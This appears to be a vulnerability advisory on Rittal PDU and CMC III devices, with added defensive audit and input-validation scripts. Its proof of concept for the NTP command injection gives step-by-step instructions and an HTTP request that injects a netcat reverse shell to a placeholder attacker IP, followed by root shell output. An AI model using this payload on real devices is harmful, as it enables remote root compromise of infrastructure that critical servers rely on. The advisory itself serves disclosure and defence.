Vendor Description
“Since its foundation in 1961, Rittal has continuously evolved into the world’s leading systems provider for enclosures, power distribution, climate control, IT infrastructure and software & services. Today, “Rittal – The System.” offers you a perfectly coordinated system platform. It unites innovative productions, pioneering engineering solutions and global service to accommodate the most diverse requirements. It caters to a whole host of industries, from machinery and plant engineering, to the automotive industry, through to information technology. All from a single source, all in top quality.”
Business Recommendation
The vendor provides a patch, which should be installed immediately, except for the PDU. No date for a PDU patch has been announced so far, and it is unclear whether the PDU will ever be updated, since a new PDU product is going to be released. SEC Consult recommends performing a thorough security review, conducted by security professionals, to identify and resolve potential further critical security issues.
Vulnerability Overview / Description
The tested devices are affected by several critical vulnerabilities.
1) CLI Menu Bypass (CVE-2020-11952)
When connecting to the PDU/CMC III devices via SSH, the devices can be configured through a CLI menu. It is easily possible to bypass this menu and break out to a shell on the device. An attacker then has access to the whole filesystem with the privileges of the user account used for the SSH login and can conduct further attacks.
2) Insecure Configuration of System Files (/etc/shadow & /etc/passwd) (CVE-2020-11955)
Critical OS files such as /etc/shadow and /etc/passwd are configured insecurely: everybody has full read, write and execute permissions on these two files. Therefore, every user with authenticated, low-privileged access to the device can elevate their privileges to root simply by manipulating the shadow file.
3) Hard-Coded Root Backdoor Account (CVE-2020-11951) & Weak Password Storage Algorithm
The root user account that exists on both PDU and CMC III devices has the identical password hash in the shadow file. This means that once an attacker knows the password, the attacker has access to several Rittal devices with the highest possible user rights. The root user and its password are not publicly documented. Furthermore, the MD5-based crypt algorithm is used for storing the password hashes in /etc/shadow, which allows much faster offline cracking than modern alternatives such as sha512crypt or bcrypt.
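The following audit script is an added example for findings 2) and 3); it is not part of the advisory and not vendor code. It checks a shadow-style file for mode bits that let any local user read or rewrite it, flags accounts whose hash uses MD5-crypt (the "$1$" prefix, which is what the advisory's "MD5" refers to), and compares the root hash of two files to spot the shared-hash condition. The sample shadow files, their permissions and the hash strings are constructed placeholders, not real device data; the function names are invented.

```shell
#!/bin/sh
# Added audit example for findings 2) and 3) of the advisory.  Everything
# below is constructed for illustration: the sample files, their modes and
# the hash strings are placeholders, not data taken from a device.

# Write two constructed shadow files into directory $1, one per "device",
# both carrying the same made-up $1$ root hash.  shadow.pdu gets the
# world-rwx permissions described in finding 2); shadow.cmc gets sane ones.
write_samples() {
    dir=$1
    mkdir -p "$dir"
    cat > "$dir/shadow.pdu" <<'EOF'
root:$1$deadbeef$XXXXXXXXXXXXXXXXXXXXXX:18000:0:99999:7:::
pdu:$1$cafef00d$YYYYYYYYYYYYYYYYYYYYYY:18000:0:99999:7:::
nobody:*:18000:0:99999:7:::
EOF
    cat > "$dir/shadow.cmc" <<'EOF'
root:$1$deadbeef$XXXXXXXXXXXXXXXXXXXXXX:18000:0:99999:7:::
admin:$6$saltsalt$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:18000:0:99999:7:::
EOF
    chmod 777 "$dir/shadow.pdu"   # finding 2): everybody may read and write
    chmod 640 "$dir/shadow.cmc"   # what /etc/shadow should look like
}

# Classify a crypt(3) hash field by its "$id$" prefix.
hash_algo() {
    case "$1" in
        '')                          echo "empty (no password required)" ;;
        '*' | '!'*)                  echo "locked" ;;
        '$1$'*)                      echo "md5crypt (weak)" ;;
        '$2a$'* | '$2b$'* | '$2y$'*) echo "bcrypt" ;;
        '$5$'*)                      echo "sha256crypt" ;;
        '$6$'*)                      echo "sha512crypt" ;;
        '$y$'* | '$7$'*)             echo "yescrypt/scrypt" ;;
        *)                           echo "unknown/DES-style" ;;
    esac
}

# Audit one shadow-style file.  Prints one line per finding: world-writable
# or world-readable mode bits, and every account whose hash is md5crypt.
audit_shadow() {
    f=$1
    mode=$(ls -ld "$f" | cut -c1-10)          # e.g. -rwxrwxrwx
    case "$mode" in
        ????????w?) echo "$f: world-writable ($mode): any local user can rewrite root's hash" ;;
    esac
    case "$mode" in
        ???????r??) echo "$f: world-readable ($mode): hashes exposed for offline cracking" ;;
    esac
    while IFS=: read -r user hash rest; do
        case "$hash" in
            '$1$'*) echo "$f: $user: $(hash_algo "$hash")" ;;
        esac
    done < "$f"
    return 0
}

# Finding 3): an identical root hash on two devices means one recovered
# password opens both.  Returns 0 if both files carry the same root hash.
same_root_hash() {
    h1=$(grep '^root:' "$1" | cut -d: -f2)
    h2=$(grep '^root:' "$2" | cut -d: -f2)
    [ -n "$h1" ] && [ "$h1" = "$h2" ]
}

# Demo run on the constructed samples.
tmp=$(mktemp -d)
write_samples "$tmp"
audit_shadow "$tmp/shadow.pdu"
audit_shadow "$tmp/shadow.cmc"
same_root_hash "$tmp/shadow.pdu" "$tmp/shadow.cmc" && echo "identical root hash on both samples"
rm -rf "$tmp"
```

On a real device the same three checks are run against /etc/shadow pulled from the firmware image or from the device itself; the world-readable and world-writable checks are the ones that turn finding 2) into a root escalation, and same_root_hash run across images of different product lines shows whether finding 3) applies to them.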
4) Outdated Software Components
The tested devices run several outdated software components with publicly known vulnerabilities, including outdated versions of OpenSSL and the Linux kernel. The outdated versions can also be identified with automated firmware analysis tools such as IoT Inspector.
5) Command Injection (CVE-2020-11953) / Privilege Escalation
The NTP server setting in the web interface of the PDU and CMC III is vulnerable to trivial command injection when the NTP server address is changed. The injected command is executed as root on the device, while the attacker only needs to be logged in as the pdu or admin user. Info: fixed in later firmware versions (PDU: V5.15.40, CMC III: V3.15.70_4). This vulnerability is still listed in this advisory because devices such as the PDU are not updated regularly, since critical servers are often attached to them. The vendor has fixed the vulnerability in the current firmware releases.
6) Webserver Started as Root (CVE-2020-11956)
The webserver runs as root, which violates the principle of least privilege. Thus, any command injection vulnerability in the webserver (such as 5) directly leads to a privilege escalation to root on the whole device.
Proof Of Concept
1) – 4)
No PoC is published because no fix is in prospect to date.
5) Command Injection / Privilege Escalation
To exploit the command injection in the NTP configuration, perform the following steps (shown for the PDU). As a proof of concept, a reverse shell is started:
a) Visit the web interface of either PDU or CMC III and log in with the default credentials of the pdu or admin user [PIC1]
b) Go to “Settings” -> Date/Time [PIC2]
c) Enter an NTP server (client-side JavaScript only allows digits and dots to be entered, which is why the request has to be modified in a proxy) and intercept the request with a web proxy such as Burp.
d) Start an nc listener on the attacker’s machine, e.g.: $ nc -lvp 9999
e) Click “save”, modify the intercepted request and add the following proof of concept as the IP address: $(nc <attacker-ip>:9999 -e /bin/sh) The nc syntax may vary depending on the firmware and device. Note: the commands are run as root! The request looks similar to the following:
POST /cgi-bin/json.cgi HTTP/1.1
Host: $deviceIP
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 238
Connection: close
Cookie: SaveStateCookie=pu
setConfig={"sessionId":1556766739,"configs":[{"option":500,"value":27},{"option":502,"value":"12:58:44"},{"option":503,"value":"10.12.2019"},{"option":504,"value":1}, {"option":505,"value":"xyz $(nc $attackerIP:9999 -e /bin/sh)"},{"option":506,"value":"0.0.0.0"}]}
f) Receive the connection and be root:
$ nc -lvp 9999
listening on [any] 9999 ...
connect to [$IP] from [$IP] 56274
# pwd
/
# whoami
root
6) Webserver Started as Root
see 5)
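The script below is an added example for findings 5) and 6), not code from the advisory or from the vendor: a minimal model of why a value like "xyz $(nc ...)" in option 505 executes, next to a hardened handler. How Rittal actually fixed the bug in V5.15.40/V3.15.70_4 is not described in the advisory; the validate-then-never-reparse pattern shown here is the generic fix. The function names and the "ntp-server=" command are invented stand-ins, and the injected payload uses a harmless echo instead of nc.

```shell
#!/bin/sh
# Added example for findings 5) and 6).  Not the vendor's CGI: the function
# names and the "ntp-server=" command are invented for illustration.

# VULNERABLE pattern: the submitted value is spliced into a command string
# that a shell parses again, so "$(...)" and backticks inside it execute.
# Because the web server runs as root (finding 6), so does the injection.
vulnerable_set_ntp() {
    sh -c "echo ntp-server=$1"
}

# Strict dotted-quad check: four decimal octets 0-255, digits and dots only,
# no empty or leading-zero octets.  Returns 0 if valid, 1 otherwise.  This is
# the server-side counterpart of the JavaScript filter the advisory bypasses.
is_ipv4() {
    case "$1" in
        '' | *[!0-9.]* | .* | *. | *..*) return 1 ;;
    esac
    (
        IFS=.
        set -- $1
        [ $# -eq 4 ] || exit 1
        for octet; do
            case "$octet" in 0?*) exit 1 ;; esac      # rejects "01", "007"
            [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || exit 1
        done
        exit 0
    )
}

# HARDENED pattern: validate first, then expand "$1" exactly once as a single
# argument of the program that needs it.  Nothing re-parses the value, so
# even a string that slipped past validation would stay literal text.
safe_set_ntp() {
    if ! is_ipv4 "$1"; then
        printf 'rejected NTP server value: %s\n' "$1" >&2
        return 1
    fi
    printf 'ntp-server=%s\n' "$1"
}

# Demo: the advisory's payload shape (harmless echo instead of nc) against
# both versions, followed by a legitimate address.
payload='xyz $(echo INJECTED)'
vulnerable_set_ntp "$payload"              # prints: ntp-server=xyz INJECTED
safe_set_ntp "$payload" || echo "blocked"  # rejected, nothing executed
safe_set_ntp 192.0.2.10                    # prints: ntp-server=192.0.2.10
```

The two defences are independent: the validator removes the attacker's characters, and passing the value as one argv element instead of building a command string removes the shell that would interpret them. Dropping root for the web server (finding 6) is the third layer; it does not stop the injection, but it turns a root shell into an unprivileged one.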
Vulnerable / Tested Versions
The following two devices have been tested and found to be vulnerable:
- CMC III PU Compact (CMCIII-PU-9333E0FB)
- PDU 7955.211 (PDU-3C002DEC)
According to Rittal, the products listed above and the following products share the same base firmware and are affected as well:
- CMC III PU 7030.000 (V3.15.70_4)
- LCP-CW (V3.15.70_4)
- whole PDU device portfolio (V5.15.40_2)
- IoT Interface 3124.300 (V6.17.00)